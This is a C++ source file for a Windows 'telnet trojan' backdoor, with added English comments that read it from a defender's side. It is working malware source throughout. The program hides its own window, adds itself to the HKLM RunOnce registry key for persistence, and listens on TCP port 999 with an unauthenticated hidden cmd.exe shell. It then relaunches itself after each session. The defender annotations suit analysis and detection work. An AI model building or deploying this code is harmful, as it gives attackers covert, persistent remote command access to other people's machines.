//vc6.0完全通过 一个多进程的telnet的木马例子
//ddxxkk
//在命令行下执行程序可以telnet 127.0.0.1 999
//以后开机后就运行
#include "stdafx.h"
#include
#include
#include
#include
#include
#include
#pragma comment(lib,"ws2_32.lib")
// buflen: size of the stack buffer shell() uses to relay data between the
// cmd.exe pipes and the client socket (PeekNamedPipe/ReadFile/recv all use it).
#define buflen 20000
void shell(char *cmds);
void createhide(char *cmds);
// port: declared but never assigned or read; shell() hard-codes 999 instead
// (the htons(port) line there is commented out).
u_int port;
// i: receives EBP via the inline asm in main(); a global so `_asm mov` can
// name it directly.
long i;
// Entry point. Behaviour splits on whether this instance has a usable stdout
// (the _fileno(stdout) check below):
//   1. Launched from a console: relaunch itself through createhide() as a
//      hidden, console-less copy and exit immediately.
//   2. The hidden copy: write its own path (argv[0]) under
//      HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce as value
//      "mytest" so it is started again, initialise Winsock and hand off to
//      shell(), which listens on TCP 999 and serves an unauthenticated cmd.exe.
// Defender's reading: the RunOnce value "mytest" pointing at this binary and a
// hidden-window process listening on 999 with cmd.exe as a child whose std
// handles are pipes are the observable indicators. KEY_ALL_ACCESS on HKLM
// needs administrative rights; without them the program prints an error and
// exits before the listener is ever created.
// Returns 0 on every path.
int main(int argc, char *argv[])
{
int *ret;
// MSVC inline asm: copy the frame pointer into the global i. ret then points
// one machine word above the saved EBP — the slot the author's note below
// ("ret-->return address") refers to. ret is never read afterwards, so these
// two lines have no effect on behaviour.
_asm mov i,ebp
ret=(int*)i+1;
/*
//registry handling procedure
HKEY hKEY;//the key handle; must be closed when the query is finished
LPCTSTR data_Set="SOFTWARE\\Microsoft\\
Windows\\CurrentVersion\\RunOnce\\";
//open the key at path data_Set: first argument is the root key, second is the
//path of the key to access, third must be 0, then the desired access rights;
//hKEY receives the handle of the key this call opens
long ret0=(::RegOpenKeyEx(HKEY_LOCAL_MACHINE, data_Set, 0, KEY_ALL_ACCESS,&hKEY));
//if the key cannot be opened, stop the program
if(ret0!=ERROR_SUCCESS) {printf("错误: 无法打开有关的hKEY!");return 0;}
//query the data (user name username_Get)
LPBYTE username_Get=new BYTE[80];
DWORD type_1=REG_SZ ; DWORD cbData_1=80;
//hKEY is the handle opened by RegOpenKeyEx() above, "DefName" is the value
//name to query, type_1 is the data type, username_Get receives the data,
//cbData_1 is the preset data length
long ret1=::RegQueryValueEx(hKEY,"mytest", NULL,&type_1, username_Get,&cbData_1);
if(ret1!=ERROR_SUCCESS)
{
//if the name does not exist, add the new value
unsigned char *username_Set;
DWORD setsize;
//char *tt=argv[0];
username_Set=(unsigned char *)argv[0];
setsize=strlen(argv[0])+1;
//like RegQueryValueEx(): hKEY is the open key handle, "DefName" is the value name to access, username_Set is the new value, type_1 and setsize give the new value's data type and length
long ret9=::RegSetValueEx(hKEY,"mytest", NULL, type_1, username_Set, setsize);
if(ret9!=ERROR_SUCCESS) { printf("错误: 无法修改有关注册表信息!"); return 0; }
}
/*
unsigned char *username_Set;
DWORD setsize;
char *tt=argv[0];
username_Set=(unsigned char *)tt;
setsize=strlen(tt)+1;
//like RegQueryValueEx(): hKEY is the open key handle, "DefName" is the value name to access, username_Set is the new value, type_1 and cbData_1 give the new value's data type and length
//if the name does not exist, add the new value
//long ret2=::RegSetValueEx(hKEY,"DefName", NULL, type_1, username_Set, cbData_1);
long ret9=::RegSetValueEx(hKEY,"mytest", NULL, type_1, username_Set, setsize);
//delete a value
//long ret4=RegDeleteValue(hKEY,"xxName");
//create a new key
//DWORD dw;
//HKEY m_hKey;
//long ret9=::RegCreateKeyEx(hKEY,"myname",0L,NULL,REG_OPTION_VOLATILE,KEY_ALL_ACCESS,NULL,&m_hKey,&dw);
//
if(ret9!=ERROR_SUCCESS)
{
printf("错误: 无法修改有关注册表信息!");
return 0;
}
*/
/*
delete[] username_Get;
// close the opened hKEY before the program ends
::RegCloseKey(hKEY);
// return 0;
*/
//ret-->return address
// Stage 1: a console-attached instance only relaunches itself hidden and
// exits. createhide() starts the child with STARTF_USESTDHANDLES and zeroed
// std handles, which is presumably what makes this check fail in the child
// — TODO confirm what _fileno(stdout) returns under that CRT.
if (_fileno(stdout)>-1) { //stdout present: launch a new process
//launch a new process with no window
createhide(argv[0]);
return 0;
}
// Stage 2 (hidden copy): persistence. Open the RunOnce key with full access.
// NOTE(review): the literal below is shown split across two physical lines;
// as printed that is not a valid string literal, most likely page wrapping
// of "...\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\".
//add an autorun entry in the registry
HKEY hKEY;
LPCTSTR data_Set="SOFTWARE\\Microsoft\\
Windows\\CurrentVersion\\RunOnce\\";
long ret0=(::RegOpenKeyEx(HKEY_LOCAL_MACHINE, data_Set, 0, KEY_ALL_ACCESS,&hKEY));
if(ret0!=ERROR_SUCCESS) {printf("错误: 无法打开有关的hKEY!");return 0;}
// Read the existing "mytest" value into an 80-byte buffer. Only the success
// code is used; an ERROR_MORE_DATA result is treated the same as "absent" and
// leads to the value being overwritten below.
LPBYTE username_Get=new BYTE[80];
DWORD type_1=REG_SZ ; DWORD cbData_1=80;
long ret1=::RegQueryValueEx(hKEY,"mytest", NULL,&type_1, username_Get,&cbData_1);
if(ret1!=ERROR_SUCCESS)
{
// Value missing: store this executable's own path (argv[0], NUL included) as
// REG_SZ. This is the persistence artefact to look for when triaging a host.
unsigned char *username_Set;
DWORD setsize;
username_Set=(unsigned char *)argv[0];
setsize=strlen(argv[0])+1;
//like RegQueryValueEx(): hKEY is the open key handle, "DefName" is the value name to access, username_Set is the new value, type_1 and setsize give the new value's data type and length
long ret9=::RegSetValueEx(hKEY,"mytest", NULL, type_1, username_Set, setsize);
// Early return here leaks username_Get and leaves hKEY open.
if(ret9!=ERROR_SUCCESS) { printf("错误: 无法修改有关注册表信息!"); return 0; }
}
delete[] username_Get;
::RegCloseKey(hKEY);
// Winsock 2.0, then the listener/relay in shell(). shell() normally ends by
// respawning a fresh hidden copy, so WSACleanup() runs only as this instance
// winds down.
WSAData wsa;
if(WSAStartup(MAKEWORD(2,0),&wsa))
{puts(" Error to start up winsock!");return 0;}
shell(argv[0]);
WSACleanup();
return 0;
}
// Serves exactly one remote shell session: binds TCP 999 on all interfaces,
// accepts the first client (no authentication, no peer filtering), spawns a
// hidden cmd.exe whose stdin/stdout/stderr are pipes, relays pipe output to
// the socket and socket input to the pipe until the client disconnects, then
// respawns this program hidden via createhide() so the listener reappears.
// Parameter: cmds — path of this executable, forwarded to createhide().
// Defender's reading: a listening socket on 999, a cmd.exe child with pipe
// std handles and SW_HIDE, and the parent re-launching itself after each
// session are the runtime signatures. bind()/listen()/CreatePipe() results
// are never checked, so a port conflict only surfaces as an accept() failure.
void shell(char *cmds)
{
SOCKET lsts,cons;
lsts=socket(AF_INET, SOCK_STREAM, 0);
if(lsts==INVALID_SOCKET)
{puts(" Create socket error!");return;}
int val=1;
// data is a 20000-byte (buflen) stack buffer shared by both relay directions.
char buff[100], data[buflen];
hostent *host;
u_long ip;
sockaddr_in locsin;
// SO_REUSEADDR: presumably so the respawned instance can rebind 999 right
// after the previous one closed its socket.
setsockopt(lsts, SOL_SOCKET, SO_REUSEADDR, (char*)&val, sizeof(val));
// Hostname lookup; ip is filled in but never used afterwards (the listener
// binds INADDR_ANY). Failure still aborts the function.
gethostname(buff,80);
host=gethostbyname(buff);
if(host==0)
{puts(" Get host error!");return;}
memcpy(&ip, host->h_addr_list[0], host->h_length);
memset(&locsin,0,sizeof(locsin));
locsin.sin_addr.s_addr=INADDR_ANY;
locsin.sin_family = AF_INET;
//locsin.sin_port = htons(port);
// Port is hard-coded; the global `port` is unused.
locsin.sin_port = htons(999);
// Return values of bind() and listen() are ignored.
bind(lsts, (sockaddr*)&locsin, sizeof(locsin));
listen(lsts,3);
int links=0;
// locsin is reused as the peer-address out-parameter of accept(); val is
// reused as its length in/out argument.
val=sizeof(locsin);
cons=accept(lsts, (sockaddr*)&locsin,&val);
if(cons==INVALID_SOCKET)
{
val=(int)GetLastError();
printf(" accept error, error code:’%d’ !",val);
return;
}
// Two inheritable anonymous pipes: rp1/wp1 carry cmd.exe output back to us,
// rp2/wp2 carry client input to cmd.exe. CreatePipe() results are unchecked.
HANDLE rp1, wp1, rp2, wp2;
SECURITY_ATTRIBUTES sa;
sa.nLength = sizeof(sa);
sa.lpSecurityDescriptor = 0;
sa.bInheritHandle = 1;
CreatePipe(&rp1, &wp1, &sa, 0);
CreatePipe(&rp2, &wp2, &sa, 0);
STARTUPINFO si;
PROCESS_INFORMATION pi;
memset(&si,0,sizeof(si));
// cmd.exe gets the pipe ends as its std handles and a hidden window;
// bInheritHandles=1 lets it inherit every inheritable handle of this process.
si.hStdError = si.hStdOutput = wp1;
si.hStdInput = rp2;
si.dwFlags = STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW;
si.wShowWindow = SW_HIDE;
si.lpReserved=0;
si.lpReserved2=0;
si.cbReserved2 =0;
si.cb = sizeof(si);
if(!CreateProcess(0, "cmd.exe", 0, 0, 1,0, 0, 0, &si, &pi))
{
// val is assigned but not reported; the accepted socket is left open here.
val=(int)GetLastError();
return;
}
// Close the child's ends in this process so pipe EOF can be observed.
CloseHandle(rp2);CloseHandle(wp1);
Sleep(200);
// num: bytes read / error sentinel (0xffffffff); use: bytes available in pipe.
u_long num, use;
while(1)
{
// Drain everything cmd.exe has written so far and forward it to the client.
// PeekNamedPipe() returns nonzero on success; `use` is the byte count waiting.
while(1)//bytes in pipe
{
if(!PeekNamedPipe(rp1, data, buflen, &num, &use, 0))
{num=0xffffffff;break;}//return TURE is OK
if(use && !ReadFile(rp1, data, use, &num, 0))
{num=0xffffffff;break;}//return 0 if error, close
if(num)send(cons, data, num, 0);
Sleep(100);
if(!use)break;
}
// Pipe error/EOF (cmd.exe gone) ends the session.
if(num==0xffffffff)break;
// Blocks until the client sends something; 0 or SOCKET_ERROR means the client
// went away. Client bytes are passed verbatim to cmd.exe's stdin.
val=recv(cons, data, buflen ,0);
if(val==0||val==SOCKET_ERROR)
{
//puts(" Write to client error!");
break;}
WriteFile(wp2, data, val, &num, 0);
Sleep(100);
}
// Tear down our pipe ends and both sockets. The cmd.exe child is neither
// terminated nor waited for, and pi.hProcess/pi.hThread are never closed;
// closing wp2 gives it EOF on stdin, which presumably makes it exit — TODO confirm.
CloseHandle(rp1);CloseHandle(wp2);
closesocket(cons);
closesocket(lsts);
// Respawn: a new hidden instance re-registers persistence and re-listens,
// so one session ending does not remove the backdoor.
//current instance ends, a new instance starts
createhide(cmds);
return;
}
// Starts a hidden, console-less copy of the program.
// Parameter: cmds — command line to run (callers pass argv[0]). It is used as
// lpCommandLine with lpApplicationName NULL, so an unquoted path containing
// spaces is subject to CreateProcess's ambiguous command-line parsing.
// The child is created with STARTF_USESTDHANDLES while all three std handle
// fields are still zero from memset, so it receives no standard handles; this
// is what main()'s _fileno(stdout) check appears to rely on (hedged — see
// main()). CREATE_NEW_CONSOLE plus SW_HIDE keeps the new console invisible.
// Defender's reading: a process spawning a copy of its own executable with a
// hidden window and bInheritHandles=1 is the observable pattern. The return
// value of CreateProcess() is ignored and pi's handles are never closed.
void createhide (char *cmds)
{
// sa is initialised but never passed to CreateProcess(); it has no effect.
SECURITY_ATTRIBUTES sa;
sa.nLength = sizeof(sa);
sa.lpSecurityDescriptor = 0;
sa.bInheritHandle = 1;
STARTUPINFO si;
PROCESS_INFORMATION pi;
memset(&si,0,sizeof(si));
// hStdInput/hStdOutput/hStdError stay NULL: the child gets no std handles.
si.dwFlags = STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW;
si.wShowWindow = SW_HIDE;
//si.wShowWindow=SW_SHOWDEFAULT;
si.lpReserved=0;
si.lpReserved2=0;
si.cbReserved2 =0;
si.cb = sizeof(si);
// bInheritHandles=1: every inheritable handle of this process (including the
// pipe/socket handles when called from shell()) is passed to the child.
CreateProcess(0,cmds, 0, 0, 1,CREATE_NEW_CONSOLE, 0, 0,&si,&pi);
return;
}